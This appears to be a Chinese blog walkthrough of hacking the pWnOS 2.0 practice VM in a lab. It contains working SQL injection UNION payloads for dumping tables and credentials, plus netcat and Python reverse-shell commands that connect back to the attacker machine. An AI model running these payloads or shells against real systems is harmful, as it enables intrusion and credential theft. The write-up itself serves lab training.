【学渗透靶机 ——pWnOS: 2.0】

环境

攻击机:kali
靶机:pWnOS: 2.0
此靶机比较特殊,vmware靶机。靶机IP固定10.10.10.100,需要配置虚拟机NAT的IP,如下图所示,
在这里插入图片描述
攻击机KALI IP为10.10.10.128
在这里插入图片描述

信息收集

主机信息收集:

已知靶机IP为10.10.10.100,所以我们直接扫描靶机开放端口 ,扫描结果如下图:

 nmap --min-rate 10000 -p- 10.10.10.100

在这里插入图片描述
主机开放了22 、80 端口 ,扫描这两个端口详细信息,扫描结果如下图

sudo nmap -sT -sV -O -p22,80 10.10.10.100

在这里插入图片描述

web信息收集

访问80

在这里插入图片描述

发现有登录和注册界面跳转,尝试访问看看
登录:
在这里插入图片描述
测试是否有sql 注入
使用burp 抓包测试:存在报错注入 ,如下图
在这里插入图片描述
通过尝试发现报错注入点在数字4 的位置
在这里插入图片描述
收集数据库相关信息:
利用数据库字段获取数据库的库、表、字段信息
查询当前数据库中有哪些表

' union select 1,2,3,group_concat(table_name,''),5,6,7,8  from  information_schema.tables where table_schema=database() -- -

在这里插入图片描述
查询users表中有哪些字段

' union select 1,2,3,COLUMN_NAME,5,6,7,8 from  information_schema.columns where TABLE_NAME="user" -- -

在这里插入图片描述
查询uses 中的账号密码:
在这里插入图片描述
密码为:c2c4b4e51d9e23c02c15702c136c3e950ba9a4af
通过工具对字符串进行判断:
在这里插入图片描述
破解出密码如下:
在这里插入图片描述

使用这个密码尝试ssh 登录 失败

收集数据库信息获取到当前用户为root ,权限比较高,
在这里插入图片描述

可以尝试上传web shell ,上传web必须知道路径,通过端口信息收集到的80 端口是apache 的web 服务,默认情况的web 目录为/var/www 我们可以尝试先判断:
在这里插入图片描述
靶机的web目录是/var/www, 并且发现了一个配置文件,查看这个配置文件,在这里插入图片描述
发现数据库配置文件:读取该文件信息
在这里插入图片描述
发现又有个账号root \goodday 尝试ssh 登录 失败,
既然能够读取文件、那我们尝试写文件
在这里插入图片描述
出现报错信息,不用管,我们尝试访问这个webshell,访问成功如下图:
在这里插入图片描述

使用命令查看是否安装nc 或者python,发现nc、和python 环境都有
在这里插入图片描述
在这里插入图片描述

使用nc 反弹shell ,失败

nc -nv 10.10.10.128 443 -e /'bin/bash'

使用python 反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

在这里插入图片描述
成功拿到webshell

权限提升

浏览文件发现一个数据库配置文件,读取文件有root 和密码,如下图:
在这里插入图片描述
使用该账号密码登录成功
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值